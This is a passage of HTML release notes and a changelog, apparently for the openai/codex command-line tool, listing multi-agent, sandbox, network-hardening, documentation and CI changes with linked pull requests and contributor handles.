data-hovercard-url="/openai/codex/pull/19949/hovercard" href="https://github.com/openai/codex/pull/19949">#19949</a>)</li>
<li>Added external agent session import, including background imports and imported-session title handling. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4339662355" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/19895" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/19895/hovercard" href="https://github.com/openai/codex/pull/19895">#19895</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4354307252" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/20284" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/20284/hovercard" href="https://github.com/openai/codex/pull/20284">#20284</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4353657495" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/20261" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/20261/hovercard" href="https://github.com/openai/codex/pull/20261">#20261</a>)</li>
<li>Made MultiAgentV2 configuration more explicit with thread caps, wait-time controls, root/subagent hints, and v2-specific depth handling. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4323052830" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/19360" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/19360/hovercard" href="https://github.com/openai/codex/pull/19360">#19360</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4334317712" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/19792" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/19792/hovercard" href="https://github.com/openai/codex/pull/19792">#19792</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4335433879" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/19805" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/19805/hovercard" href="https://github.com/openai/codex/pull/19805">#19805</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4345291655" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/20052" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/20052/hovercard" href="https://github.com/openai/codex/pull/20052">#20052</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4349167164" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/20180" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/20180/hovercard" href="https://github.com/openai/codex/pull/20180">#20180</a>)</li>
</ul>
<h2>Bug Fixes</h2>
<ul>
<li>Fixed several resume and interruption issues, including stale interrupt hangs, persisted provider restoration, large remote resume responses, and slow filtered resume lists. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4285144527" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/18392" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/18392/hovercard" href="https://github.com/openai/codex/pull/18392">#18392</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4320754809" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/19287" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/19287/hovercard" href="https://github.com/openai/codex/pull/19287">#19287</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4340388395" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/19920" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/19920/hovercard" href="https://github.com/openai/codex/pull/19920">#19920</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329053575" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/19591" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/19591/hovercard" href="https://github.com/openai/codex/pull/19591">#19591</a>)</li>
<li>Improved TUI reliability around terminal resize reflow, markdown list spacing, slash-command popup layout, keyboard cleanup, shell-mode escape, and working status updates. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4291546363" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/18575" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/18575/hovercard" href="https://github.com/openai/codex/pull/18575">#18575</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4331884811" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/19706" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/19706/hovercard" href="https://github.com/openai/codex/pull/19706">#19706</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4327330725" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/19511" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/19511/hovercard" href="https://github.com/openai/codex/pull/19511">#19511</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329774759" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/19625" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/19625/hovercard" href="https://github.com/openai/codex/pull/19625">#19625</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4343748114" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/19986" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/19986/hovercard" href="https://github.com/openai/codex/pull/19986">#19986</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4341029370" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/19939" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/19939/hovercard" href="https://github.com/openai/codex/pull/19939">#19939</a>)</li>
<li>Hardened managed network behavior for deferred denials, proxy bypass defaults, resolved target checks, IPv6 host matching, and <code>git -C</code> approval handling. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4318244058" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/19184" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/19184/hovercard" href="https://github.com/openai/codex/pull/19184">#19184</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4344226188" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/20002" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/20002/hovercard" href="https://github.com/openai/codex/pull/20002">#20002</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4344193667" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/19999" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/19999/hovercard" href="https://github.com/openai/codex/pull/19999">#19999</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4344063790" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/19995" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/19995/hovercard" href="https://github.com/openai/codex/pull/19995">#19995</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4346333994" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/20085" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/20085/hovercard" href="https://github.com/openai/codex/pull/20085">#20085</a>)</li>
<li>Fixed Windows sandbox and PTY edge cases, including pseudoconsole startup, elevated runner process handling, core shell environment inheritance, and named-pipe validation. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4345101156" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/20042" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/20042/hovercard" href="https://github.com/openai/codex/pull/20042">#20042</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4319029128" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/19211" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/19211/hovercard" href="https://github.com/openai/codex/pull/19211">#19211</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4346571594" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/20089" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/20089/hovercard" href="https://github.com/openai/codex/pull/20089">#20089</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4320574869" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/19283" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/19283/hovercard" href="https://github.com/openai/codex/pull/19283">#19283</a>)</li>
<li>Fixed Bedrock model support for <code>apply_patch</code>, GPT-5.4 reasoning levels, and updated Bedrock GPT-5.4 endpoint/model metadata. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4324807580" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/19416" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/19416/hovercard" href="https://github.com/openai/codex/pull/19416">#19416</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4326109026" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/19461" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/19461/hovercard" href="https://github.com/openai/codex/pull/19461">#19461</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4347228184" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/20109" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/20109/hovercard" href="https://github.com/openai/codex/pull/20109">#20109</a>)</li>
<li>Fixed MCP/plugin edge cases around stdio server cleanup, plugin MCP approval persistence, and custom MCP metadata isolation. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4332888788" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/19753" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/19753/hovercard" href="https://github.com/openai/codex/pull/19753">#19753</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4327579194" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/19537" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/19537/hovercard" href="https://github.com/openai/codex/pull/19537">#19537</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4337616105" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/19836" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/19836/hovercard" href="https://github.com/openai/codex/pull/19836">#19836</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4338725536" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/19875" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/19875/hovercard" href="https://github.com/openai/codex/pull/19875">#19875</a>)</li>
</ul>
<h2>Documentation</h2>
<ul>
<li>Updated the bundled OpenAI Docs skill for GPT-5.5, <code>gpt-image-2</code>, and clearer upgrade guidance. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4324529585" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/19407" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/19407/hovercard" href="https://github.com/openai/codex/pull/19407">#19407</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4325626268" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/19443" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/19443/hovercard" href="https://github.com/openai/codex/pull/19443">#19443</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4324957638" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/19422" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/19422/hovercard" href="https://github.com/openai/codex/pull/19422">#19422</a>)</li>
<li>Clarified contributor-facing docs, including the PR template, Rust async trait guidance, and README wording. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4340162343" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/19912" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/19912/hovercard" href="https://github.com/openai/codex/pull/19912">#19912</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4352706064" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/20242" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/20242/hovercard" href="https://github.com/openai/codex/pull/20242">#20242</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4327361493" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/19514" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/19514/hovercard" href="https://github.com/openai/codex/pull/19514">#19514</a>)</li>
<li>Added a checked-in <code>codex-core</code> public API listing and a ThreadManager sample crate. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4352716575" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/20243" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/20243/hovercard" href="https://github.com/openai/codex/pull/20243">#20243</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4348072542" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/20141" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/20141/hovercard" href="https://github.com/openai/codex/pull/20141">#20141</a>)</li>
</ul>
<h2>Chores</h2>
<ul>
<li>Published <code>codex-app-server</code> release artifacts, stopped publishing GNU Linux binaries, and increased release workflow timeouts. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4325693268" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/19447" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/19447/hovercard" href="https://github.com/openai/codex/pull/19447">#19447</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4325668320" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/19445" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/19445/hovercard" href="https://github.com/openai/codex/pull/19445">#19445</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4354086046" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/20271" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/20271/hovercard" href="https://github.com/openai/codex/pull/20271">#20271</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4355806929" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/20343" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/20343/hovercard" href="https://github.com/openai/codex/pull/20343">#20343</a>)</li>
<li>Added Codex-pinned versioning for the Python app-server SDK package. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4310128057" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/18996" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/18996/hovercard" href="https://github.com/openai/codex/pull/18996">#18996</a>)</li>
<li>Deprecated <code>--full-auto</code> while steering users toward explicit permission profiles and trust flows. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4347639414" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/20133" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/20133/hovercard" href="https://github.com/openai/codex/pull/20133">#20133</a>)</li>
<li>Stabilized CI and release plumbing with Bazel setup migration, release smoke-test pinning, and updated workflow pins/timeouts. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4337939332" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/19851" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/19851/hovercard" href="https://github.com/openai/codex/pull/19851">#19851</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4337975466" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/19854" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/19854/hovercard" href="https://github.com/openai/codex/pull/19854">#19854</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4326377980" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/19472" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/19472/hovercard" href="https://github.com/openai/codex/pull/19472">#19472</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329482943" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/19609" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/19609/hovercard" href="https://github.com/openai/codex/pull/19609">#19609</a>)</li>
</ul>
<h2>Changelog</h2>
<p>Full Changelog: <a class="commit-link" href="https://github.com/openai/codex/compare/rust-v0.125.0...rust-v0.128.0"><tt>rust-v0.125.0...rust-v0.128.0</tt></a></p>
<ul>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4315188695" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/19124" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/19124/hovercard" href="https://github.com/openai/codex/pull/19124">#19124</a> Make MultiAgentV2 interruption markers assistant-authored <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jif-oai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jif-oai">@jif-oai</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4322799387" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/19354" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/19354/hovercard" href="https://github.com/openai/codex/pull/19354">#19354</a> chore: alias max_concurrent_threads_per_session <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jif-oai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jif-oai">@jif-oai</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4323052830" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/19360" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/19360/hovercard" href="https://github.com/openai/codex/pull/19360">#19360</a> feat: surface multi-agent thread limit in spawn description <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jif-oai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jif-oai">@jif-oai</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4322720056" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/19351" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/19351/hovercard" href="https://github.com/openai/codex/pull/19351">#19351</a> Add agents.interrupt_message for interruption markers <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jif-oai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jif-oai">@jif-oai</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4285144527" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/18392" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/18392/hovercard" href="https://github.com/openai/codex/pull/18392">#18392</a> Fix hang on turn/interrupt <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/danwang-oai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/danwang-oai">@danwang-oai</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4323617007" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/19380" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/19380/hovercard" href="https://github.com/openai/codex/pull/19380">#19380</a> chore: drop MCP Plugins and App from Morpheus <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jif-oai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jif-oai">@jif-oai</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4305903656" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/18907" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/18907/hovercard" href="https://github.com/openai/codex/pull/18907">#18907</a> respect workspace option for disabling plugins <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/zamoshchin-openai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/zamoshchin-openai">@zamoshchin-openai</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4320574869" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/19283" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/19283/hovercard" href="https://github.com/openai/codex/pull/19283">#19283</a> check PID of named pipe consumer <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/iceweasel-oai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/iceweasel-oai">@iceweasel-oai</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4324529585" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/19407" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/19407/hovercard" href="https://github.com/openai/codex/pull/19407">#19407</a> Update bundled OpenAI Docs skill for GPT-5.5 <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kkahadze-oai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kkahadze-oai">@kkahadze-oai</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4317464284" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/19163" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/19163/hovercard" href="https://github.com/openai/codex/pull/19163">#19163</a> Harden package-manager install policy <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mcgrew-oai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mcgrew-oai">@mcgrew-oai</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4324807580" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/19416" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/19416/hovercard" href="https://github.com/openai/codex/pull/19416">#19416</a> Fix: use function apply_patch tool for Bedrock model <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/celia-oai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/celia-oai">@celia-oai</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4314096234" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/19093" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/19093/hovercard" href="https://github.com/openai/codex/pull/19093">#19093</a> [codex] Omit fork turns from thread started notifications <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/euroelessar/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/euroelessar">@euroelessar</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4319684610" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/19244" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/19244/hovercard" href="https://github.com/openai/codex/pull/19244">#19244</a> Update unix socket transport to use WebSocket upgrade <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/willwang-openai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/willwang-openai">@willwang-openai</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4317897933" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/19170" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/19170/hovercard" href="https://github.com/openai/codex/pull/19170">#19170</a> Skip disabled rows in selection menu numbering and default focus <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/canvrno-oai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/canvrno-oai">@canvrno-oai</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4324743900" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/19414" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/19414/hovercard" href="https://github.com/openai/codex/pull/19414">#19414</a> permissions: make legacy profile conversion cwd-free <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bolinfest/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bolinfest">@bolinfest</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4305570958" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/18900" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/18900/hovercard" href="https://github.com/openai/codex/pull/18900">#18900</a> Migrate fork and resume reads to thread store <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/wiltzius-openai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/wiltzius-openai">@wiltzius-openai</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4325668320" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/19445" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/19445/hovercard" href="https://github.com/openai/codex/pull/19445">#19445</a> ci: stop publishing GNU Linux release artifacts <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bolinfest/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bolinfest">@bolinfest</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4325626268" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/19443" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/19443/hovercard" href="https://github.com/openai/codex/pull/19443">#19443</a> Add gpt-image-2 to bundled OpenAI Docs skill <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kkahadze-oai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kkahadze-oai">@kkahadze-oai</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4291651116" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/18584" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/18584/hovercard" href="https://github.com/openai/codex/pull/18584">#18584</a> [4/4] Honor Streamable HTTP MCP placement <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/aibrahim-oai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/aibrahim-oai">@aibrahim-oai</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4325693268" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/19447" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/19447/hovercard" href="https://github.com/openai/codex/pull/19447">#19447</a> ci: publish codex-app-server release artifacts <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bolinfest/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bolinfest">@bolinfest</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4324957638" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/19422" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/19422/hovercard" href="https://github.com/openai/codex/pull/19422">#19422</a> Clarify bundled OpenAI Docs upgrade guide wording <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kkahadze-oai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kkahadze-oai">@kkahadze-oai</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4320259229" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/19266" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/19266/hovercard" href="https://github.com/openai/codex/pull/19266">#19266</a> [codex] add non-local thread store regression harness <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/wiltzius-openai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/wiltzius-openai">@wiltzius-openai</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4314148225" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/19098" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/19098/hovercard" href="https://github.com/openai/codex/pull/19098">#19098</a> feat: Compress skill paths with root aliases <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/xl-openai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/xl-openai">@xl-openai</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4318933049" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/19207" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/19207/hovercard" href="https://github.com/openai/codex/pull/19207">#19207</a> [codex] Forward Codex Apps tool call IDs to backend metadata <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rreichel3-oai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rreichel3-oai">@rreichel3-oai</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4325823527" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/19453" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/19453/hovercard" href="https://github.com/openai/codex/pull/19453">#19453</a> Serialize legacy Windows PowerShell sandbox tests <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dylan-hurd-oai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dylan-hurd-oai">@dylan-hurd-oai</a></li>
